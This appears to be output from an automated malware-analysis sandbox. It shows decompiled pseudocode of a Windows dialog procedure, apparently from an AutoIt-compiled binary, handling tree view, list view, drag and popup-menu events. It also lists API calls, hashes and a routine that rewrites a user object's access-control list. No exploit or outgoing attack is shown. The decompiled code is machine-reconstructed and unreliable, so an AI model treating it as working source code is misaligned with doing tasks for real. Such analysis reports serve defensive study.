								_t224 = DefDlgProcW(_a4, 0x4e, _a8, _t422);
								L13:
								return _t224;
							}
							_t387 =  *0xb77824; // 0xc88258
							_t388 =  *((intOrPtr*)( *((intOrPtr*)(_t387 + _t223 * 4))));
							_t226 =  *((intOrPtr*)(_t388 + 0x90));
							__eflags = _t226 - 0x10;
							if(_t226 == 0x10) {
								L101:
								_t228 =  *((intOrPtr*)(_t422 + 0xc)) - 1;
								__eflags = _t228;
								if(_t228 == 0) {
									_t224 = 0x20;
									goto L13;
								}
								_t229 = _t228 - 0x10000;
								__eflags = _t229;
								if(_t229 != 0) {
									goto L12;
								}
								__eflags =  *((intOrPtr*)(_t388 + 0x48)) - 0xfe000000;
								_v165 = _t229;
								if( *((intOrPtr*)(_t388 + 0x48)) == 0xfe000000) {
									_v165 = 1;
								}
								_t232 = E00AB27D2(0xb777b0,  *((intOrPtr*)(_t422 + 0x2c)),  &_v144,  &_v164);
								__eflags = _t232;
								if(_t232 != 0) {
									_t233 =  *0xb77824; // 0xc88258
									_t429 = _v164.x;
									_t236 = GetWindowLongW( *( *((intOrPtr*)( *((intOrPtr*)(_t233 + _t429 * 4)))) + 0x34), 0xfffffff0);
									__eflags = _t236 & 0x08000000;
									if((_t236 & 0x08000000) != 0) {
										goto L106;
									}
									__eflags =  *(_t422 + 0x28) & 0x00000011;
									_t390 =  *0xb77824; // 0xc88258
									if(( *(_t422 + 0x28) & 0x00000011) == 0) {
										L110:
										_t239 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t390 + _t429 * 4)))) + 0x4c));
										__eflags = _t239 - 0xffffffff;
										if(_t239 != 0xffffffff) {
											 *((intOrPtr*)(_t422 + 0x30)) = _t239;
											_t390 =  *0xb77824; // 0xc88258
										}
										_t242 =  *( *((intOrPtr*)( *((intOrPtr*)(_t390 + _t429 * 4)))) + 0x48);
										__eflags = _t242;
										if(_t242 < 0) {
											goto L106;
										} else {
											__eflags = _v165;
											if(_v165 == 0) {
												L115:
												 *(_t422 + 0x34) = _t242;
												goto L106;
											}
											__eflags =  *(_t422 + 0x24) & 0x00000001;
											if(( *(_t422 + 0x24) & 0x00000001) == 0) {
												goto L106;
											}
											goto L115;
										}
									}
									_t244 =  *((intOrPtr*)( *((intOrPtr*)(_t390 + _t429 * 4))));
									__eflags =  *((char*)(_t244 + 0x90)) - 0x14;
									if( *((char*)(_t244 + 0x90)) != 0x14) {
										goto L12;
									}
									goto L110;
								} else {
									L106:
									_t224 = 0;
									goto L13;
								}
							}
							__eflags = _t226 - 0x13;
							if(_t226 != 0x13) {
								goto L12;
							}
							goto L101;
						}
						__eflags = _t385 - 0xfffffffb;
						if(_t385 == 0xfffffffb) {
							_v165 = 0;
							E00AB2714(0xb777b0, _t426, 1);
							GetCursorPos( &_v164);
							ScreenToClient( *_t422,  &_v164);
							_t393 = E00AB29AB(0xb777b0,  *_t422);
							_v172 = _t393;
							_v176 = _t393;
							__eflags = _t393 - 0xffffffff;
							if(_t393 != 0xffffffff) {
								L79:
								_t251 =  *0xb77824; // 0xc88258
								_v148 = _t393;
								_t254 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t251 + _t393 * 4)))) + 0x90));
								__eflags = _t254 - 0x10;
								if(_t254 == 0x10) {
									_v140 = _v156.x;
									_v136 = _v156.y;
									_t258 = SendMessageW( *_t422, 0x1111, 0,  &_v140);
									__eflags = _t258;
									if(_t258 == 0) {
										L96:
										ClientToScreen( *_t422,  &_v156);
										_t261 =  *0xb77824; // 0xc88258
										_t395 =  *( *((intOrPtr*)( *((intOrPtr*)(_t261 + _v164.y * 4)))) + 0xc);
										__eflags = _t395;
										if(_t395 == 0) {
											goto L12;
										}
										TrackPopupMenuEx(_t395, 0x80, _v156.x, _v156.y,  *_v120, 0);
										L37:
										_t224 = 1;
										goto L13;
									}
									_v92 = _t258;
									_v96 = 4;
									SendMessageW( *_t422, 0x113e, 0,  &_v96);
									__eflags = _v132 & 0x00000046;
									if((_v132 & 0x00000046) == 0) {
										goto L96;
									}
									_t271 = E00AB27D2(0xb777b0, _v60,  &_v144,  &_v164);
									__eflags = _t271;
									if(_t271 == 0) {
										L95:
										_v164.y = _v148;
										goto L96;
									}
									_t397 = _v164.x;
									_t273 =  *0xb77824; // 0xc88258
									_v164.y = _t397;
									_t275 =  *((intOrPtr*)( *((intOrPtr*)(_t273 + _t397 * 4))));
									__eflags =  *(_t275 + 0xc);
									if( *(_t275 + 0xc) != 0) {
										goto L96;
									}
									goto L95;
								}
								__eflags = _t254 - 0x13;
								if(_t254 != 0x13) {
									goto L12;
								}
								_v116 = _v156.x;
								_v112 = _v156.y;
								_t279 = SendMessageW( *_t422, 0x1012, 0,  &_v116);
								__eflags = _t279 - 0xffffffff;
								if(_t279 <= 0xffffffff) {
									L89:
									ClientToScreen( *_t422,  &_v156);
									_t282 =  *0xb77824; // 0xc88258
									_t399 =  *( *((intOrPtr*)( *((intOrPtr*)(_t282 + _v164.y * 4)))) + 0xc);
									__eflags = _t399;
									if(_t399 != 0) {
										TrackPopupMenuEx(_t399, 0, _v156.x, _v156.y,  *_v120, 0);
									}
									goto L12;
								}
								__eflags = _v165;
								if(_v165 != 0) {
									goto L89;
								}
								_v52 = _t279;
								_v56 = 4;
								_t288 = SendMessageW( *_t422, 0x104b, 0,  &_v56);
								__eflags = _t288;
								if(_t288 == 0) {
									goto L12;
								}
								__eflags = _v108 & 0x0000000e;
								if((_v108 & 0x0000000e) == 0) {
									goto L89;
								}
								_t291 = E00AB27D2(0xb777b0, _v24,  &_v144,  &_v164);
								__eflags = _t291;
								if(_t291 == 0) {
									L88:
									_v164.y = _v148;
									goto L89;
								}
								_t401 = _v164.x;
								_t293 =  *0xb77824; // 0xc88258
								_v164.y = _t401;
								_t295 =  *( *(_t293 + _t401 * 4));
								__eflags = _t295;
								if(_t295 == 0) {
									goto L88;
								}
								__eflags =  *(_t295 + 0xc);
								if( *(_t295 + 0xc) != 0) {
									goto L89;
								}
								goto L88;
							}
							_t393 = E00AB29AB(0xb777b0, GetParent( *_t422));
							_v164.x = _t393;
							_v168 = _t393;
							__eflags = _t393 - 0xffffffff;
							if(_t393 == 0xffffffff) {
								goto L12;
							}
							_v165 = 1;
							goto L79;
						}
						__eflags = _t385 - 0xfffffffe;
						if(_t385 != 0xfffffffe) {
							goto L12;
						}
						E00AB2714(0xb777b0, _t426, 1);
						GetCursorPos( &_v164);
						ScreenToClient( *_t422,  &_v164);
						_t303 = E00AB29AB(0xb777b0,  *_t422);
						__eflags = _t303 - 0xffffffff;
						if(_t303 == 0xffffffff) {
							goto L12;
						}
						_t405 =  *0xb77824; // 0xc88258
						_t306 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t405 + _t303 * 4)))) + 0x90));
						__eflags = _t306 - 0x10;
						if(_t306 < 0x10) {
							goto L12;
						}
						__eflags = _t306 - 0x11;
						if(_t306 <= 0x11) {
							_v140 = _v156.x;
							_v136 = _v156.y;
							_t310 = SendMessageW( *_t422, 0x1111, 0,  &_v140);
							__eflags = _t310;
							if(_t310 != 0) {
								_v92 = _t310;
								_v96 = 0xc;
								_v84 = 0xf000;
								SendMessageW( *_t422, 0x113e, 0,  &_v96);
								__eflags = _v132 & 0x00000046;
								if((_v132 & 0x00000046) != 0) {
									SendMessageW( *_t422, 0x110b, 9, 0);
									SendMessageW( *_t422, 0x110b, 9, _v128);
								}
							}
							goto L12;
						}
						__eflags = _t306 - 0x13;
						if(_t306 != 0x13) {
							goto L12;
						}
						_v116 = _v156;
						_v112 = _v156.y;
						_t318 = SendMessageW( *_t422, 0x1012, 0,  &_v116);
						__eflags = _t318 - 0xffffffff;
						if(_t318 == 0xffffffff) {
							goto L12;
						}
						_v52 = _t318;
						_v56 = 4;
						SendMessageW( *_t422, 0x104b, 0,  &_v56);
						__eflags = _v108 & 0x0000000e;
						if((_v108 & 0x0000000e) == 0) {
							goto L12;
						}
						_push(0);
						_push(_v24);
						L45:
						E00B3B9C3();
						goto L12;
					}
					if(__eflags == 0) {
						ReleaseCapture();
						goto L12;
					}
					__eflags = _t385 - 0xfffffec0;
					if(_t385 == 0xfffffec0) {
						L61:
						InvalidateRect( *_t422, 0, 1);
						goto L12;
					}
					__eflags = _t385 - 0xfffffed4;
					if(_t385 == 0xfffffed4) {
						goto L61;
					}
					__eflags = _t385 - 0xffffff93;
					if(_t385 == 0xffffff93) {
						ImageList_SetDragCursorImage( *0xb7785c, 0, 0, 0);
						ImageList_BeginDrag( *0xb7785c, 0, 0xfffffff8, 0xfffffff0);
						SetCapture(_a4);
						 *0xb77860 = _a8;
						_v140 = 0;
						_v132 = 0;
						_v128 = 1;
						E00AB4DC0(__ebx,  &_v140);
						_v140 = _a8;
						_v128 = 1;
						E00AC1A36(__ebx,  &_v116, __eflags, L"@GUI_DRAGID");
						E00AB3EA3(0xb78270, _t418, _t422, __eflags,  &_v120,  &_v144, 1);
						E00AC1CB6( &_v132);
						_t439 = _t422 + 0x20;
						ClientToScreen( *_t422, _t439);
						ImageList_DragEnter(0,  *_t439,  *(_t422 + 0x24));
						E00AB4DC0(__ebx,  &_v156);
					} else {
						__eflags = _t385 - 0xffffff94;
						if(_t385 == 0xffffff94) {
							_t440 =  *((intOrPtr*)(_t422 + 4));
							_t341 = E00AB27D2(0xb777b0, _t440,  &_v144,  &_v164);
							__eflags = _t341;
							if(_t341 != 0) {
								_t342 =  *0xb77824; // 0xc88258
								_push(0);
								 *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t342 + _v164.x * 4)))) + 0x96)) =  *(_t422 + 0x10);
								_push( *((intOrPtr*)(_t422 + 4)));
								E00B3B9C3();
								_t419 =  *0xb77824; // 0xc88258
								_t414 = _v172;
								_t347 =  *((intOrPtr*)( *((intOrPtr*)(_t419 + _v172 * 4))));
								__eflags =  *(_t347 + 0x28);
								if( *(_t347 + 0x28) > 0) {
									 *0xb777ec = _t440;
									E00AC1C9C(0xb777f0,  *((intOrPtr*)( *((intOrPtr*)(_t419 + _t414 * 4)))) + 0x24);
									_t352 =  *0xb77824; // 0xc88258
									 *0xb77800 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t352 + _v165 * 4)))) + 0x98));
									SendMessageW( *_t422, 0x1030,  *(_t422 + 0x10), 0xb3b9ba);
								}
							}
						}
					}
					goto L12;
				}
				if(_t450 == 0) {
					L46:
					_t441 = 0;
					_t357 = SendMessageW( *_t422, 0x110a, 9, 0);
					__eflags = _t357;
					if(_t357 == 0) {
						goto L12;
					}
					_v92 = _t357;
					_v96 = 4;
					_t359 = SendMessageW( *_t422, 0x113e, 0,  &_v96);
					__eflags = _t359;
					if(_t359 == 0) {
						goto L12;
					}
					__eflags =  *(_t422 + 0x34) -  *((intOrPtr*)(_t422 + 0x5c));
					if( *(_t422 + 0x34) ==  *((intOrPtr*)(_t422 + 0x5c))) {
						goto L12;
					}
					__eflags =  *((intOrPtr*)(_t422 + 0xc)) - 0x1000;
					if( *((intOrPtr*)(_t422 + 0xc)) == 0x1000) {
						goto L12;
					}
					__eflags =  *((intOrPtr*)(_t422 + 0xc)) - 1;
					L26:
					if(__eflags == 0) {
						goto L12;
					}
					_push(_t441);
					_push(_v60);
					goto L45;
				}
				_t451 = _t385 - 0xfffffdd9;
				if(_t451 > 0) {
					__eflags = _t385 - 0xfffffdda;
					if(_t385 == 0xfffffdda) {
						_t362 = GetKeyState(0x11);
						__eflags = _t362;
						if(_t362 >= 0) {
							goto L12;
						}
						_t363 = GetKeyState(9);
						__eflags = _t363;
						if(_t363 >= 0) {
							goto L12;
						}
						_t443 = SendMessageW( *_t422, 0x130b, 0, 0);
						_t365 = GetKeyState(0x10);
						__eflags = _t365;
						if(_t365 >= 0) {
							_t444 = _t443 + 1;
							__eflags = _t444;
						} else {
							_t444 = _t443 - 1;
						}
						_push(_t444);
						L44:
						_push( *((intOrPtr*)(_t422 + 4)));
						goto L45;
					}
					__eflags = _t385 - 0xfffffdee;
					if(_t385 == 0xfffffdee) {
						__eflags =  *(_t426 + 0x188);
						if( *(_t426 + 0x188) == 0) {
							goto L12;
						}
						_t420 =  *0xb77834; // 0x2
						_t417 = 3;
						__eflags = _t420 - _t417;
						if(_t420 < _t417) {
							goto L12;
						}
						_t445 =  *0xb77824; // 0xc88258
						do {
							_t367 =  *( *(_t445 + _t417 * 4));
							__eflags = _t367;
							if(_t367 == 0) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t367 + 4)) - _v144;
							_t422 = _a12;
							if( *((intOrPtr*)(_t367 + 4)) != _v144) {
								goto L34;
							}
							__eflags = ( *(_t367 + 0x93) & 0x000000ff) -  *((intOrPtr*)(_t422 + 4));
							if(( *(_t367 + 0x93) & 0x000000ff) ==  *((intOrPtr*)(_t422 + 4))) {
								break;
							}
							L34:
							_t417 = _t417 + 1;
							__eflags = _t417 - _t420;
						} while (_t417 <= _t420);
						__eflags = _t417 - _t420;
						if(_t417 > _t420) {
							goto L12;
						}
						E00AD42DE(_t422 + 0x10,  *((intOrPtr*)( *( *(_t445 + _t417 * 4)) + 0x54)), 0x4f);
						__eflags = 0;
						 *((short*)(_t422 + 0xae)) = 0;
						goto L37;
					}
					__eflags = _t385 - 0xfffffe3d;
					if(_t385 == 0xfffffe3d) {
						goto L46;
					}
					__eflags = _t385 - 0xfffffe64;
					if(_t385 != 0xfffffe64) {
						goto L12;
					}
					_t374 =  *_t422;
					_v148 = _t374;
					_t375 = GetWindowLongW(_t374, 0xfffffff0);
					__eflags = _t375 & 0x00000100;
					if((_t375 & 0x00000100) == 0) {
						goto L12;
					}
					__eflags =  *((short*)(_t422 + 0xc)) - 0x20;
					if( *((short*)(_t422 + 0xc)) != 0x20) {
						goto L12;
					}
					_t441 = 0;
					_t376 = SendMessageW(_v148, 0x110a, 9, 0);
					__eflags = _t376;
					if(_t376 == 0) {
						goto L12;
					}
					_v92 = _t376;
					_v96 = 4;
					__eflags = SendMessageW(_v148, 0x113e, 0,  &_v96);
					goto L26;
				}
				if(_t451 == 0) {
					_push(SendMessageW( *_t422, 0x130b, 0, 0));
					goto L44;
				}
				if(_t385 == 0xfffffd09) {
					__eflags =  *((char*)(_t426 + 0x199));
					 *((char*)(_t426 + 0x19a)) = 1;
					if( *((char*)(_t426 + 0x199)) != 0) {
						goto L12;
					} else {
						 *((char*)(_t426 + 0x19a)) = 0;
						_push( *((intOrPtr*)(_t422 + 8)));
						goto L44;
					}
				}
				if(_t385 == 0xfffffd0e) {
					 *((char*)(_t426 + 0x199)) = 1;
					goto L12;
				}
				if(_t385 == 0xfffffd0f) {
					__eflags =  *((char*)(_t426 + 0x19a)) - 1;
					if( *((char*)(_t426 + 0x19a)) == 1) {
						_push(_t385);
						_push( *((intOrPtr*)(_t422 + 4)));
						E00B3B9C3();
					}
					 *((short*)(_t426 + 0x199)) = 0;
					goto L12;
				}
				if(_t385 != 0xfffffd16) {
					goto L12;
				} else {
					_push(_t385);
					goto L44;
				}
			}

0x00b3d17a
0x00b3d17f
0x00b3d185
0x00b3d188
0x00b3d194
0x00b3d196
0x00b3d199
0x00b3d19d
0x00b3d19f
0x00b3d427
0x00b3d42a
0x00b3d5d1
0x00b3d5d4
0x00b3d98f
0x00b3d994
0x00b3d998
0x00b3d99b
0x00b3d1ff
0x00b3d208
0x00b3d20e
0x00b3d213
0x00b3d213
0x00b3d9a1
0x00b3d9aa
0x00b3d9ac
0x00b3d9b2
0x00b3d9b4
0x00b3d9be
0x00b3d9c1
0x00b3d9c1
0x00b3d9c2
0x00b3da78
0x00000000
0x00b3da78
0x00b3d9c8
0x00b3d9c8
0x00b3d9cd
0x00000000
0x00000000
0x00b3d9d3
0x00b3d9da
0x00b3d9de
0x00b3d9e0
0x00b3d9e0
0x00b3d9f4
0x00b3d9f9
0x00b3d9fb
0x00b3da04
0x00b3da09
0x00b3da17
0x00b3da1d
0x00b3da22
0x00000000
0x00000000
0x00b3da24
0x00b3da28
0x00b3da2e
0x00b3da42
0x00b3da47
0x00b3da4a
0x00b3da4d
0x00b3da4f
0x00b3da52
0x00b3da52
0x00b3da5d
0x00b3da60
0x00b3da62
0x00000000
0x00b3da64
0x00b3da64
0x00b3da69
0x00b3da71
0x00b3da71
0x00000000
0x00b3da71
0x00b3da6b
0x00b3da6f
0x00000000
0x00000000
0x00000000
0x00b3da6f
0x00b3da62
0x00b3da33
0x00b3da35
0x00b3da3c
0x00000000
0x00000000
0x00000000
0x00b3d9fd
0x00b3d9fd
0x00b3d9fd
0x00000000
0x00b3d9fd
0x00b3d9fb
0x00b3d9b6
0x00b3d9b8
0x00000000
0x00000000
0x00000000
0x00b3d9b8
0x00b3d5da
0x00b3d5dd
0x00b3d742
0x00b3d749
0x00b3d753
0x00b3d760
0x00b3d76f
0x00b3d771
0x00b3d775
0x00b3d779
0x00b3d77c
0x00b3d7a6
0x00b3d7a6
0x00b3d7ab
0x00b3d7b4
0x00b3d7ba
0x00b3d7bc
0x00b3d8b9
0x00b3d8c1
0x00b3d8d2
0x00b3d8d8
0x00b3d8da
0x00b3d940
0x00b3d947
0x00b3d951
0x00b3d95b
0x00b3d95e
0x00b3d960
0x00000000
0x00000000
0x00b3d97b
0x00b3d36a
0x00b3d36c
0x00000000
0x00b3d36c
0x00b3d8dc
0x00b3d8ed
0x00b3d8f5
0x00b3d8fb
0x00b3d900
0x00000000
0x00000000
0x00b3d918
0x00b3d91d
0x00b3d91f
0x00b3d938
0x00b3d93c
0x00000000
0x00b3d93c
0x00b3d921
0x00b3d925
0x00b3d92a
0x00b3d931
0x00b3d933
0x00b3d936
0x00000000
0x00000000
0x00000000
0x00b3d936
0x00b3d7c2
0x00b3d7c4
0x00000000
0x00000000
0x00b3d7d0
0x00b3d7d8
0x00b3d7e9
0x00b3d7ef
0x00b3d7f2
0x00b3d871
0x00b3d878
0x00b3d882
0x00b3d88c
0x00b3d88f
0x00b3d891
0x00b3d8a8
0x00b3d8a8
0x00000000
0x00b3d891
0x00b3d7f4
0x00b3d7f9
0x00000000
0x00000000
0x00b3d7fb
0x00b3d80f
0x00b3d81a
0x00b3d820
0x00b3d822
0x00000000
0x00000000
0x00b3d828
0x00b3d82d
0x00000000
0x00000000
0x00b3d845
0x00b3d84a
0x00b3d84c
0x00b3d869
0x00b3d86d
0x00000000
0x00b3d86d
0x00b3d84e
0x00b3d852
0x00b3d857
0x00b3d85e
0x00b3d860
0x00b3d862
0x00000000
0x00000000
0x00b3d864
0x00b3d867
0x00000000
0x00000000
0x00000000
0x00b3d867
0x00b3d78e
0x00b3d790
0x00b3d794
0x00b3d798
0x00b3d79b
0x00000000
0x00000000
0x00b3d7a1
0x00000000
0x00b3d7a1
0x00b3d5e3
0x00b3d5e6
0x00000000
0x00000000
0x00b3d5f6
0x00b3d600
0x00b3d60d
0x00b3d617
0x00b3d61c
0x00b3d61f
0x00000000
0x00000000
0x00b3d625
0x00b3d630
0x00b3d636
0x00b3d638
0x00000000
0x00000000
0x00b3d63e
0x00b3d640
0x00b3d6bb
0x00b3d6c3
0x00b3d6d4
0x00b3d6da
0x00b3d6dc
0x00b3d6e2
0x00b3d6f3
0x00b3d6fb
0x00b3d703
0x00b3d709
0x00b3d70e
0x00b3d724
0x00b3d733
0x00b3d733
0x00b3d70e
0x00000000
0x00b3d6dc
0x00b3d642
0x00b3d644
0x00000000
0x00000000
0x00b3d650
0x00b3d658
0x00b3d669
0x00b3d66f
0x00b3d672
0x00000000
0x00000000
0x00b3d678
0x00b3d68c
0x00b3d697
0x00b3d69d
0x00b3d6a2
0x00000000
0x00000000
0x00b3d6a8
0x00b3d6a9
0x00b3d3ba
0x00b3d3ba
0x00000000
0x00b3d3ba
0x00b3d430
0x00b3d5c6
0x00000000
0x00b3d5c6
0x00b3d436
0x00b3d43c
0x00b3d5b5
0x00b3d5bb
0x00000000
0x00b3d5bb
0x00b3d442
0x00b3d448
0x00000000
0x00000000
0x00b3d44e
0x00b3d451
0x00b3d513
0x00b3d526
0x00b3d52f
0x00b3d53c
0x00b3d541
0x00b3d545
0x00b3d549
0x00b3d551
0x00b3d55e
0x00b3d567
0x00b3d56b
0x00b3d580
0x00b3d589
0x00b3d58e
0x00b3d594
0x00b3d5a1
0x00b3d5ab
0x00b3d457
0x00b3d457
0x00b3d45a
0x00b3d460
0x00b3d473
0x00b3d478
0x00b3d47a
0x00b3d480
0x00b3d489
0x00b3d494
0x00b3d49b
0x00b3d49e
0x00b3d4a3
0x00b3d4a9
0x00b3d4b0
0x00b3d4b2
0x00b3d4b6
0x00b3d4bc
0x00b3d4d0
0x00b3d4d5
0x00b3d4ee
0x00b3d4fd
0x00b3d4fd
0x00b3d4b6
0x00b3d47a
0x00b3d45a
0x00000000
0x00b3d451
0x00b3d1a5
0x00b3d3c4
0x00b3d3c4
0x00b3d3d0
0x00b3d3d6
0x00b3d3d8
0x00000000
0x00000000
0x00b3d3de
0x00b3d3ef
0x00b3d3f7
0x00b3d3fd
0x00b3d3ff
0x00000000
0x00000000
0x00b3d408
0x00b3d40b
0x00000000
0x00000000
0x00b3d411
0x00b3d418
0x00000000
0x00000000
0x00b3d41e
0x00b3d2e9
0x00b3d2e9
0x00000000
0x00000000
0x00b3d2ef
0x00b3d2f0
0x00000000
0x00b3d2f0
0x00b3d1b0
0x00b3d1b2
0x00b3d255
0x00b3d25b
0x00b3d37a
0x00b3d37c
0x00b3d37f
0x00000000
0x00000000
0x00b3d387
0x00b3d389
0x00b3d38c
0x00000000
0x00000000
0x00b3d3a5
0x00b3d3a7
0x00b3d3ad
0x00b3d3b0
0x00b3d3b5
0x00b3d3b5
0x00b3d3b2
0x00b3d3b2
0x00b3d3b2
0x00b3d3b6
0x00b3d3b7
0x00b3d3b7
0x00000000
0x00b3d3b7
0x00b3d261
0x00b3d267
0x00b3d2f9
0x00b3d300
0x00000000
0x00000000
0x00b3d306
0x00b3d30e
0x00b3d30f
0x00b3d311
0x00000000
0x00000000
0x00b3d317
0x00b3d31d
0x00b3d320
0x00b3d322
0x00b3d324
0x00000000
0x00000000
0x00b3d32a
0x00b3d32d
0x00b3d330
0x00000000
0x00000000
0x00b3d339
0x00b3d33c
0x00000000
0x00000000
0x00b3d33e
0x00b3d33e
0x00b3d33f
0x00b3d33f
0x00b3d343
0x00b3d345
0x00000000
0x00000000
0x00b3d359
0x00b3d361
0x00b3d363
0x00000000
0x00b3d363
0x00b3d26d
0x00b3d273
0x00000000
0x00000000
0x00b3d279
0x00b3d27f
0x00000000
0x00000000
0x00b3d285
0x00b3d28a
0x00b3d28e
0x00b3d294
0x00b3d299
0x00000000
0x00000000
0x00b3d29f
0x00b3d2a4
0x00000000
0x00000000
0x00b3d2aa
0x00b3d2b8
0x00b3d2be
0x00b3d2c0
0x00000000
0x00000000
0x00b3d2c6
0x00b3d2d9
0x00b3d2e7
0x00000000
0x00b3d2e7
0x00b3d1b8
0x00b3d24f
0x00000000
0x00b3d24f
0x00b3d1c4
0x00b3d21f
0x00b3d226
0x00b3d22d
0x00000000
0x00b3d22f
0x00b3d22f
0x00b3d236
0x00000000
0x00b3d236
0x00b3d22d
0x00b3d1cc
0x00b3d216
0x00000000
0x00b3d216
0x00b3d1d4
0x00b3d1e4
0x00b3d1eb
0x00b3d1ed
0x00b3d1ee
0x00b3d1f1
0x00b3d1f1
0x00b3d1f6
0x00000000
0x00b3d1f6
0x00b3d1dc
0x00000000
0x00b3d1de
0x00b3d1de
0x00000000
0x00b3d1de

APIs

Part of subcall function 00AB29E2: GetWindowLongW.USER32(?,000000EB), ref: 00AB29F3

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00B3D208
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B3D249
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00B3D28E
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B3D2B8
SendMessageW.USER32 ref: 00B3D2E1
_wcsncpy.LIBCMT ref: 00B3D359
GetKeyState.USER32(00000011), ref: 00B3D37A
GetKeyState.USER32(00000009), ref: 00B3D387
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B3D39D
GetKeyState.USER32(00000010), ref: 00B3D3A7
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B3D3D0
SendMessageW.USER32 ref: 00B3D3F7
SendMessageW.USER32(?,00001030,?,00B3B9BA), ref: 00B3D4FD
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00B3D513
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00B3D526
SetCapture.USER32(?), ref: 00B3D52F
ClientToScreen.USER32(?,?), ref: 00B3D594
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00B3D5A1
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B3D5BB
ReleaseCapture.USER32(?,?,?), ref: 00B3D5C6
GetCursorPos.USER32(?,?,00000001,?,?,?), ref: 00B3D600
ScreenToClient.USER32 ref: 00B3D60D
SendMessageW.USER32(?,00001012,00000000,?), ref: 00B3D669
SendMessageW.USER32 ref: 00B3D697
SendMessageW.USER32(?,00001111,00000000,?), ref: 00B3D6D4
SendMessageW.USER32 ref: 00B3D703
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00B3D724
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00B3D733
GetCursorPos.USER32(?), ref: 00B3D753
ScreenToClient.USER32 ref: 00B3D760
GetParent.USER32(?), ref: 00B3D780
SendMessageW.USER32(?,00001012,00000000,?), ref: 00B3D7E9
SendMessageW.USER32 ref: 00B3D81A
ClientToScreen.USER32(?,?), ref: 00B3D878
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00B3D8A8
SendMessageW.USER32(?,00001111,00000000,?), ref: 00B3D8D2
SendMessageW.USER32 ref: 00B3D8F5
ClientToScreen.USER32(?,?), ref: 00B3D947
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00B3D97B

Part of subcall function 00AB29AB: GetWindowLongW.USER32(?,000000EB), ref: 00AB29BC

GetWindowLongW.USER32(?,000000F0), ref: 00B3DA17

Strings

@GUI_DRAGID, xrefs: 00B3D562
F, xrefs: 00B3D8FB

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3977979337-4164748364
Opcode ID: ac6e15daf8882779d9259328bfbd337c1c2370efe4d2ee6a054be82098187861
Instruction ID: 829cb3cd3647f6ef4cb8c8cd3b1c41747f756c20fe2cf4cbf279495e0527108b
Opcode Fuzzy Hash: ac6e15daf8882779d9259328bfbd337c1c2370efe4d2ee6a054be82098187861
Instruction Fuzzy Hash: 9E42B134208341AFDB24DF28D884FAABBE5FF49310F240699F699972A1CB71DD54CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00B088CD, Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B08E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B08E3C
Part of subcall function 00B08E20: GetLastError.KERNEL32(?,00B08900,?,?,?), ref: 00B08E46
Part of subcall function 00B08E20: GetProcessHeap.KERNEL32(00000008,?,?,00B08900,?,?,?), ref: 00B08E55
Part of subcall function 00B08E20: HeapAlloc.KERNEL32(00000000,?,00B08900,?,?,?), ref: 00B08E5C
Part of subcall function 00B08E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B08E73

Part of subcall function 00B08EBD: GetProcessHeap.KERNEL32(00000008,00B08916,00000000,00000000,?,00B08916,?), ref: 00B08EC9
Part of subcall function 00B08EBD: HeapAlloc.KERNEL32(00000000,?,00B08916,?), ref: 00B08ED0
Part of subcall function 00B08EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00B08916,?), ref: 00B08EE1

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B08931
_memset.LIBCMT ref: 00B08946
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B08965
GetLengthSid.ADVAPI32(?), ref: 00B08976
GetAce.ADVAPI32(?,00000000,?), ref: 00B089B3
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B089CF
GetLengthSid.ADVAPI32(?), ref: 00B089EC
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00B089FB
HeapAlloc.KERNEL32(00000000), ref: 00B08A02
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B08A23
CopySid.ADVAPI32(00000000), ref: 00B08A2A
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B08A5B
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B08A81
SetUserObjectSecurity.USER32 ref: 00B08A95

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
